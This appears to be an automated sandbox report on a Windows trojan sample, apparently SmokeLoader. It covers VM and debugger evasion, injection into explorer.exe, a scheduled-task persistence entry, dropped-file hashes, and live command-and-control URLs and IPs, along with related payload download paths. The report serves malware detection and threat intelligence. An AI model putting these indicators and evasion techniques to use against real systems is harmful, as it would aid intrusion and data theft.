    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
    Source: explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
    Source: explorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
    Source: explorer.exe, 00000002.00000000.2043431169.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
    Source: explorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2044572626.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0040D21D LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_0040D21D
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0040D21D LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_0040D21D
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0413092B mov eax, dword ptr fs:[00000030h]0_2_0413092B
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_04130D90 mov eax, dword ptr fs:[00000030h]0_2_04130D90
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeCode function: 0_2_0434B033 push dword ptr fs:[00000030h]0_2_0434B033
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_0406B103 push dword ptr fs:[00000030h]4_2_0406B103
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_041A092B mov eax, dword ptr fs:[00000030h]4_2_041A092B
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 4_2_041A0D90 mov eax, dword ptr fs:[00000030h]4_2_041A0D90
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_0413C59B push dword ptr fs:[00000030h]6_2_0413C59B
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_05C60D90 mov eax, dword ptr fs:[00000030h]6_2_05C60D90
    Source: C:\Users\user\AppData\Roaming\ivfjsrsCode function: 6_2_05C6092B mov eax, dword ptr fs:[00000030h]6_2_05C6092B

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\explorer.exeFile created: ivfjsrs.2.drJump to dropped file
    Source: C:\Windows\explorer.exeNetwork Connect: 190.187.52.42 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 119.204.11.2 80Jump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeThread created: C:\Windows\explorer.exe EIP: 33219D0Jump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsThread created: unknown EIP: 31819D0Jump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\rBwTlpgnjc.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\ivfjsrsSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: explorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
    Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2044391132.0000000004B00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000002.00000000.2043086064.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000002.00000000.2042687938.0000000000EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    32
    Process Injection
    11
    Masquerading
    OS Credential Dumping431
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    DLL Side-Loading
    12
    Virtualization/Sandbox Evasion
    LSASS Memory12
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media2
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)32
    Process Injection
    Security Account Manager3
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Hidden Files and Directories
    NTDS1
    Application Window Discovery
    Distributed Component Object ModelInput Capture113
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Software Packing
    Cached Domain Credentials2
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    File Deletion
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432077 Sample: rBwTlpgnjc.exe Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 23 nidoe.org 2->23 37 Snort IDS alert for network traffic 2->37 39 Multi AV Scanner detection for domain / URL 2->39 41 Found malware configuration 2->41 43 7 other signatures 2->43 7 rBwTlpgnjc.exe 2->7         started        10 ivfjsrs 2->10         started        12 ivfjsrs 2->12         started        signatures3 process4 signatures5 45 Detected unpacking (changes PE section rights) 7->45 47 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->47 49 Maps a DLL or memory area into another process 7->49 51 Creates a thread in another existing process (thread injection) 7->51 14 explorer.exe 93 3 7->14 injected 53 Antivirus detection for dropped file 10->53 55 Multi AV Scanner detection for dropped file 10->55 57 Machine Learning detection for dropped file 10->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->59 61 Checks if the current machine is a virtual machine (disk enumeration) 12->61 process6 dnsIp7 25 nidoe.org 119.204.11.2, 49711, 49712, 49713 KIXS-AS-KRKoreaTelecomKR Korea Republic of 14->25 27 190.187.52.42, 49739, 49740, 49741 AMERICATELPERUSAPE Peru 14->27 19 C:\Users\user\AppData\Roaming\ivfjsrs, PE32 14->19 dropped 21 C:\Users\user\...\ivfjsrs:Zone.Identifier, ASCII 14->21 dropped 29 System process connects to network (likely due to code injection or exploit) 14->29 31 Benign windows process drops PE files 14->31 33 Deletes itself after installation 14->33 35 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->35 file8 signatures9

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    rBwTlpgnjc.exe44%VirustotalBrowse
    rBwTlpgnjc.exe100%AviraHEUR/AGEN.1361904
    rBwTlpgnjc.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\ivfjsrs100%AviraHEUR/AGEN.1361904
    C:\Users\user\AppData\Roaming\ivfjsrs100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\ivfjsrs44%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    nidoe.org20%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://word.office.comon0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    http://crl.v0%URL Reputationsafe
    http://uama.com.ua/tmp/index.php100%Avira URL Cloudmalware
    http://talesofpirates.net/tmp/index.php100%Avira URL Cloudmalware
    http://sodez.ru/tmp/index.php100%Avira URL Cloudmalware
    http://nidoe.org/tmp/index.php100%Avira URL Cloudmalware
    http://talesofpirates.net/tmp/index.php17%VirustotalBrowse
    http://sodez.ru/tmp/index.php21%VirustotalBrowse
    http://nidoe.org/tmp/index.php22%VirustotalBrowse
    http://uama.com.ua/tmp/index.php18%VirustotalBrowse
    NameIPActiveMaliciousAntivirus DetectionReputation
    nidoe.org
    119.204.11.2
    truetrueunknown
    NameMaliciousAntivirus DetectionReputation
    http://talesofpirates.net/tmp/index.phptrue
    • 17%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://uama.com.ua/tmp/index.phptrue
    • 18%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://sodez.ru/tmp/index.phptrue
    • 21%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://nidoe.org/tmp/index.phptrue
    • 22%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://word.office.comonexplorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2050412699.000000000C860000.00000004.00000001.00020000.00000000.sdmpfalse
      high
      https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2044572626.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
        high
        https://powerpoint.office.comcemberexplorer.exe, 00000002.00000000.2049916857.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        unknown
        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000002.00000000.2049916857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          https://api.msn.com/explorer.exe, 00000002.00000000.2046464539.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            https://excel.office.comexplorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              http://schemas.microexplorer.exe, 00000002.00000000.2045859613.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045270374.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2045828799.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.vexplorer.exe, 00000002.00000000.2042687938.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://outlook.comexplorer.exe, 00000002.00000000.2046464539.0000000009B41000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                https://wns.windows.com/)sexplorer.exe, 00000002.00000000.2046464539.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  190.187.52.42
                  unknownPeru
                  19180AMERICATELPERUSAPEtrue
                  119.204.11.2
                  nidoe.orgKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1432077
                  Start date and time:2024-04-26 11:46:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 39s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:rBwTlpgnjc.exe
                  renamed because original name is a hash value
                  Original Sample Name:ee4e08febd22e594c7bcb70ea1b0252a.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@3/2@6/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 43
                  • Number of non-executed functions: 18
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  11:47:00API Interceptor513291x Sleep call for process: explorer.exe modified
                  11:47:17Task SchedulerRun new task: Firefox Default Browser Agent 68950386A9F11A8F path: C:\Users\user\AppData\Roaming\ivfjsrs
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  190.187.52.42SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                  • sdfjhuz.com/dl/build2.exe
                  file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                  • habrafa.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
                  fnKtfdi0P0.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                  • emgvod.com/uploads/logo3.jpg
                  O1yQjHheL6.exeGet hashmaliciousAmadey, PureLog Stealer, SmokeLoaderBrowse
                  • emgvod.com/uploads/logo3.jpg
                  Oa5MQwNPBq.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                  • habrafa.com/test1/get.php?pid=589A025AAF5058B231B95CD1C4770414
                  fcdf869bc179759c8be3093adec60b334d25cad63b78fd3d28229b0af88b765b_dump.exeGet hashmaliciousSmokeLoaderBrowse
                  • sjyey.com/tmp/index.php
                  Qkk9UKA1cW.exeGet hashmaliciousSmokeLoaderBrowse
                  • gxutc2c.com/tmp/index.php
                  SecuriteInfo.com.Win32.DropperX-gen.5130.14297.exeGet hashmaliciousSmokeLoaderBrowse
                  • gxutc2c.com/tmp/index.php
                  toolspub1.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                  • habrafa.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
                  vRngJnoGJU.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, SmokeLoader, VidarBrowse
                  • habrafa.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  nidoe.orgSecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exeGet hashmaliciousGlupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                  • 211.202.224.10
                  SecuriteInfo.com.Win32.BotX-gen.23345.1691.exeGet hashmaliciousPureLog Stealer, SmokeLoaderBrowse
                  • 189.146.143.77
                  SecuriteInfo.com.Win32.PWSX-gen.16966.19531.exeGet hashmaliciousPureLog Stealer, SmokeLoaderBrowse
                  • 93.136.70.55
                  file.exeGet hashmaliciousPureLog Stealer, SmokeLoaderBrowse
                  • 92.36.226.66
                  5J2C26juDg.exeGet hashmaliciousSmokeLoaderBrowse
                  • 190.249.187.165
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 95.158.162.200
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 211.168.53.110
                  2LksWs2xq7.exeGet hashmaliciousSmokeLoaderBrowse
                  • 175.119.10.231
                  YWwcRHSpbw.exeGet hashmaliciousSmokeLoaderBrowse
                  • 187.211.208.213
                  i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                  • 37.255.238.137
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  KIXS-AS-KRKoreaTelecomKRSecuriteInfo.com.Win32.Malware-gen.9746.16728.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 112.175.50.218
                  WwKYOW4jIg.elfGet hashmaliciousMiraiBrowse
                  • 222.112.186.45
                  tw7rloKDkG.elfGet hashmaliciousMiraiBrowse
                  • 175.219.70.176
                  ZcOjro0Chh.elfGet hashmaliciousMiraiBrowse
                  • 14.32.5.202
                  uqGHhft2DO.elfGet hashmaliciousMiraiBrowse
                  • 183.127.235.108
                  5RiFmXTOMp.elfGet hashmaliciousMiraiBrowse
                  • 175.216.85.211
                  Hs97Nxxy5u.elfGet hashmaliciousMiraiBrowse
                  • 175.250.196.247
                  sBgS8t0K7i.elfGet hashmaliciousMiraiBrowse
                  • 211.34.203.16
                  n0CEgmtnuf.elfGet hashmaliciousMiraiBrowse
                  • 221.160.166.181
                  bUuAPqXmkL.elfGet hashmaliciousMiraiBrowse
                  • 59.26.88.68
                  AMERICATELPERUSAPEE8zldNa4ks.elfGet hashmaliciousUnknownBrowse
                  • 190.187.188.187
                  SSDAIG33Zh.exeGet hashmaliciousBabuk, DjvuBrowse
                  • 190.187.52.42
                  6A9jBmgfEz.elfGet hashmaliciousMiraiBrowse
                  • 190.187.132.110
                  4JJkk655SP.elfGet hashmaliciousUnknownBrowse
                  • 190.187.141.172
                  file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoaderBrowse
                  • 190.187.52.42
                  01vS5TqGur.elfGet hashmaliciousMiraiBrowse
                  • 190.187.141.142
                  L5dJXUt9Sz.elfGet hashmaliciousMiraiBrowse
                  • 190.187.141.144
                  fnKtfdi0P0.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc, XmrigBrowse
                  • 190.187.52.42
                  O1yQjHheL6.exeGet hashmaliciousAmadey, PureLog Stealer, SmokeLoaderBrowse
                  • 190.187.52.42
                  Oa5MQwNPBq.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                  • 190.187.52.42
                  No context
                  No context
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):305152
                  Entropy (8bit):6.518070145151798
                  Encrypted:false
                  SSDEEP:3072:IHNWG9ZvpYjEk+P0VL9xFD3GeiRsBbaAcNrw5K86+i2XmSIN8niFWhr:vAqQkdxl3tilNF86Ph8nPr
                  MD5:EE4E08FEBD22E594C7BCB70EA1B0252A
                  SHA1:B1594033FA6E0377CCAEA80D1556459128C61A13
                  SHA-256:3B6C00F64A1D047DFBED967D4FE8F320F4E4DE9421A82D94DCB3EBA07F23D939
                  SHA-512:255190C874BF83BE9B4126FB7C3DBEE8EB4F4B6C5BC019EE5C586B984115B03759C3A511EFCB8C79797E7CC0141C75A8F715316B214D6683A8C25015D316DDD8
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: Virustotal, Detection: 44%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................q.....N.......O......=.........X/K.....u...X/p...Rich..........................PE..L.....c.....................|......WD....... ....@...........................................................................(....0...g...........................!..8............................x..@............ ..|............................text...5........................... ..`.rdata..rl... ...n..................@..@.data...............t..............@....rsrc....g...0...h...,..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\explorer.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.518070145151798
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.53%
                  • InstallShield setup (43055/19) 0.43%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:rBwTlpgnjc.exe
                  File size:305'152 bytes
                  MD5:ee4e08febd22e594c7bcb70ea1b0252a
                  SHA1:b1594033fa6e0377ccaea80d1556459128c61a13
                  SHA256:3b6c00f64a1d047dfbed967d4fe8f320f4e4de9421a82d94dcb3eba07f23d939
                  SHA512:255190c874bf83be9b4126fb7c3dbee8eb4f4b6c5bc019ee5c586b984115b03759c3a511efcb8c79797e7cc0141c75a8f715316b214d6683a8c25015d316ddd8
                  SSDEEP:3072:IHNWG9ZvpYjEk+P0VL9xFD3GeiRsBbaAcNrw5K86+i2XmSIN8niFWhr:vAqQkdxl3tilNF86Ph8nPr
                  TLSH:E3544A0362E17CA0E62247728F2EBAEC3B2DFD654F556B2723585E0B18741F0D263B56
